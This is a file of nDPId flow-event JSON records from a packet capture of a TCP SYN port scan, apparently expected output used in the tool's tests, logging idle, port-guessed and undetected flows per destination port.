+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 